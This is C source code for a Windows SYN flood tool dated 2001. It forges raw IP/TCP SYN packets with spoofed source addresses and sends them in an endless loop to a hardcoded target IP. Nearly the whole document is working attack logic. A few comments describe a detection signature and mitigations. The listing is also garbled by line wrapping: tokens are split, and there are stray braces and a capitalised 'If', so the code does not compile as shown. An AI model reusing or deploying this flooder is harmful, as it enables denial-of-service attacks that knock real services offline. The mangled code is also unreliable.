编译环境:VC++6.0,编译时需要包含ws2_32.lib <br>
////////////////////////////////////////////////////////////////////////// <br>
// // <br>
// SYN Flooder For Win2K by Shotgun // <br>
// // <br>
// THIS PROGRAM IS MODIFIED FROM A LINUX VERSION BY Zakath // <br>
// THANX Lion Hook FOR PROGRAM OPTIMIZATION // <br>
// // <br>
// Released: [2001.4] // <br>
// Author: [Shotgun] // <br>
// Homepage: // <br>
// [http://IT.Xici.Net] // <br>
// [http://WWW.Patching.Net] // <br>
// // <br>
////////////////////////////////////////////////////////////////////////// <br>
#include <winsock2.h> <br>
#include <Ws2tcpip.h> <br>
#include <stdio.h> <br>
#include <stdlib.h> <br>
#define SEQ 0x28376839 // base TCP sequence number; main() adds the running counter SendSEQ to it <br>
#define SYN_DEST_IP "192.168.15.250"// IP address of the attacked host <br>
#define FAKE_IP "10.168.150.1" // starting value of the spoofed source IP; the spoofed addresses used by this program span one class B network <br>
#define STATUS_FAILED 0xFFFF // exit code returned on error <br>
typedef struct _iphdr // IP header definition <br>
{ <br>
unsigned char h_verlen; // 4-bit header length, 4-bit IP version <br>
unsigned char tos; // 8-bit type of service (TOS) <br>
unsigned short total_len; // 16-bit total length (bytes) <br>
unsigned short ident; // 16-bit identification <br>
unsigned short frag_and_flags; // 3-bit flags; NOTE(review): in the IPv4 layout this 16-bit field also carries the 13-bit fragment offset <br>
unsigned char ttl; // 8-bit time to live (TTL) <br>
unsigned char proto; // 8-bit protocol (TCP, UDP or other) <br>
unsigned short checksum; // 16-bit IP header checksum <br>
unsigned int sourceIP; // 32-bit source IP address <br>
unsigned int destIP; // 32-bit destination IP address <br>
}IP_HEADER; <br>
struct // TCP pseudo-header definition; main() uses it only as checksum input <br>
{ <br>
unsigned long saddr; // source address <br>
unsigned long daddr; // destination address <br>
char mbz; // main() sets this byte to 0 <br>
char ptcl; // protocol type <br>
unsigned short tcpl; // TCP length <br>
}psd_header; <br>
typedef struct _tcphdr // TCP header definition <br>
{ <br>
USHORT th_sport; // 16-bit source port <br>
USHORT th_dport; // 16-bit destination port <br>
unsigned int th_seq; // 32-bit sequence number <br>
unsigned int th_ack; // 32-bit acknowledgement number <br>
unsigned char th_lenres; // 4-bit header length / 6 reserved bits <br>
unsigned char th_flag; // 6-bit flags <br>
USHORT th_win; // 16-bit window size <br>
USHORT th_sum; // 16-bit checksum <br>
USHORT th_urp; // 16-bit urgent data offset <br>
}TCP_HEADER; <br>
// checksum: helper that computes the 16-bit one's-complement checksum
// used for the IP and TCP headers.
//
// buffer  start of the data, read as a sequence of 16-bit words
// size    number of bytes to sum; a trailing odd byte is added on its own
//
// Returns the bitwise complement of the folded sum, truncated to 16 bits.
USHORT checksum(USHORT *buffer, int size)
{
    unsigned long total = 0;
    unsigned long folded;
    int remaining;

    // Add up every complete 16-bit word.
    for (remaining = size; remaining > 1; remaining -= sizeof(USHORT)) {
        total += *buffer++;
    }

    // One byte left over: add it as-is.
    if (remaining != 0) {
        total += *(UCHAR*)buffer;
    }

    // Fold the carries above bit 15 back into the low 16 bits, twice,
    // so that a carry produced by the first fold is absorbed as well.
    folded = (total & 0xffff) + (total >> 16);
    folded += (folded >> 16);

    return (USHORT)(~folded);
}
// main: the SYN flood routine. <br>
// It starts Winsock, opens a raw socket with IP_HDRINCL set, fills an IPv4 header and a TCP header whose flag byte is 2 (SYN), <br>
// and then loops without end, sending that 40-byte header pair to SYN_DEST_IP with a source address that changes on every packet (FakeIpHost+SendSEQ). <br>
// Defender view: several header fields are constants in this code (source port 7000, destination port 8080, TTL 128, window 16384, IP ident 1), <br>
// and the sequence number increases in step with the source address, so the traffic has a recognisable signature. <br>
// SYN cookies on the receiving host and source-address validation (BCP 38) at network edges are the standard mitigations for this traffic pattern. <br>
// NOTE(review): the listing was hard-wrapped by the page it was taken from (tokens are split across lines), so it is not compilable as shown. <br>
int main() <br>
{ <br>
int datasize,ErrorCode,counter,flag,FakeIpNet,FakeIpHost; <br>
// TimeOut is the value passed to SO_SNDTIMEO below; SendSEQ is the per-packet counter added to both the source IP and the sequence number <br>
int TimeOut=2000,SendSEQ=0; <br>
char SendBuf[128]={0}; <br>
// RecvBuf is not referenced anywhere else in this function <br>
char RecvBuf[65535]={0}; <br>
WSADATA wsaData; <br>
SOCKET SockRaw=(SOCKET)NULL; <br>
struct sockaddr_in DestAddr; <br>
IP_HEADER ip_header; <br>
TCP_HEADER tcp_header; <br>
// Initialise Winsock and create the SOCK_RAW socket <br>
if((ErrorCode=WSAStartup(MAKEWORD(2,1),&wsaData))!=0){ <br>
fprintf(stderr,"WSAStartup failed: %d\n",ErrorCode); <br>
ExitProcess(STATUS_FAILED); <br>
} <br>
SockRaw=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPE <br>
D)); <br>
if (SockRaw==INVALID_SOCKET){ <br>
fprintf(stderr,"WSASocket() failed: %d\n",WSAGetLastError()); <br>
ExitProcess(STATUS_FAILED); <br>
} <br>
} <br>
flag=TRUE; <br>
// Set IP_HDRINCL so that the program supplies the IP header itself <br>
ErrorCode=setsockopt(SockRaw,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof( <br>
int) <br>
); <br>
If (ErrorCode==SOCKET_ERROR) printf("Set IP_HDRINCL Error!\n"); <br>
__try{ <br>
// Set the send timeout <br>
ErrorCode=setsockopt(SockRaw,SOL_SOCKET,SO_SNDTIMEO,(char*)&TimeOut, <br>
size <br>
of(TimeOut)); <br>
if(ErrorCode==SOCKET_ERROR){ <br>
fprintf(stderr,"Failed to set send TimeOut: %d\n",WSAGetLastErro <br>
r()) <br>
; <br>
__leave; <br>
} <br>
memset(&DestAddr,0,sizeof(DestAddr)); <br>
DestAddr.sin_family=AF_INET; <br>
DestAddr.sin_addr.s_addr=inet_addr(SYN_DEST_IP); <br>
FakeIpNet=inet_addr(FAKE_IP); <br>
FakeIpHost=ntohl(FakeIpNet); <br>
// Fill in the IP header <br>
ip_header.h_verlen=(4<<4 | sizeof(ip_header)/sizeof(unsigned long)); <br>
<br>
// high 4 bits: IP version; low 4 bits: header length <br>
ip_header.total_len=htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER)); <br>
// 16-bit total length (bytes) <br>
ip_header.ident=1; <br>
// 16-bit identification <br>
ip_header.frag_and_flags=0; <br>
// 3-bit flags <br>
ip_header.ttl=128; <br>
// 8-bit time to live (TTL) <br>
ip_header.proto=IPPROTO_TCP; <br>
// 8-bit protocol (TCP, UDP, ...) <br>
ip_header.checksum=0; <br>
// 16-bit IP header checksum <br>
ip_header.sourceIP=htonl(FakeIpHost+SendSEQ); <br>
// 32-bit source IP address <br>
ip_header.destIP=inet_addr(SYN_DEST_IP); <br>
// 32-bit destination IP address <br>
// Fill in the TCP header <br>
tcp_header.th_sport=htons(7000); <br>
// source port number <br>
tcp_header.th_dport=htons(8080); <br>
// destination port number <br>
tcp_header.th_seq=htonl(SEQ+SendSEQ); <br>
// SYN sequence number <br>
tcp_header.th_ack=0; <br>
// ACK number set to 0 <br>
tcp_header.th_lenres=(sizeof(TCP_HEADER)/4<<4|0); <br>
// TCP header length and reserved bits <br>
tcp_header.th_flag=2; <br>
// SYN flag <br>
tcp_header.th_win=htons(16384); <br>
// window size <br>
tcp_header.th_urp=0; <br>
// offset (the urgent-data field) <br>
tcp_header.th_sum=0; <br>
// checksum <br>
// Fill in the TCP pseudo-header (used only to compute the checksum; it is not actually sent) <br>
psd_header.saddr=ip_header.sourceIP; <br>
// source address <br>
psd_header.daddr=ip_header.destIP; <br>
// destination address <br>
psd_header.mbz=0; <br>
psd_header.ptcl=IPPROTO_TCP; <br>
// protocol type <br>
psd_header.tcpl=htons(sizeof(tcp_header)); <br>
// TCP header length <br>
while(1) { <br>
// Print one marker for every 10,240 packets sent <br>
printf("."); <br>
for(counter=0;counter<10240;counter++){ <br>
if(SendSEQ++==65536) SendSEQ=1; <br>
// the sequence counter wraps around <br>
// Update the IP header <br>
ip_header.checksum=0; <br>
// 16-bit IP header checksum <br>
ip_header.sourceIP=htonl(FakeIpHost+SendSEQ); <br>
// 32-bit source IP address <br>
// Update the TCP header <br>
tcp_header.th_seq=htonl(SEQ+SendSEQ); <br>
// SYN sequence number <br>
tcp_header.th_sum=0; <br>
// checksum <br>
// Update the TCP pseudo-header <br>
psd_header.saddr=ip_header.sourceIP; <br>
// Compute the TCP checksum; the computation has to include the TCP pseudo-header <br>
memcpy(SendBuf,&psd_header,sizeof(psd_header)); <br>
memcpy(SendBuf+sizeof(psd_header),&tcp_header,sizeof(tcp_hea <br>
der) <br>
); <br>
); <br>
tcp_header.th_sum=checksum((USHORT *)SendBuf,sizeof(psd_head <br>
er)+ <br>
sizeof(tcp_header)); <br>
// Compute the IP checksum <br>
memcpy(SendBuf,&ip_header,sizeof(ip_header)); <br>
memcpy(SendBuf+sizeof(ip_header),&tcp_header,sizeof(tcp_head <br>
er)) <br>
; <br>
memset(SendBuf+sizeof(ip_header)+sizeof(tcp_header),0,4); <br>
datasize=sizeof(ip_header)+sizeof(tcp_header); <br>
ip_header.checksum=checksum((USHORT *)SendBuf,datasize); <br>
// Fill the send buffer <br>
memcpy(SendBuf,&ip_header,sizeof(ip_header)); <br>
// Send the TCP packet <br>
ErrorCode=sendto(SockRaw, <br>
SendBuf, <br>
datasize, <br>
0, <br>
(struct sockaddr*) &DestAddr, <br>
sizeof(DestAddr)); <br>
if (ErrorCode==SOCKET_ERROR) printf("\nSend Error:%d\n",GetLastError()); <br>
}//End of for <br>
}//End of While <br>
}//End of try <br>
// Cleanup path: close the socket if one was opened, then release Winsock <br>
__finally { <br>
if (SockRaw != INVALID_SOCKET) closesocket(SockRaw); <br>
WSACleanup(); <br>
} <br>
return 0; <br>
} <br>
-- <br>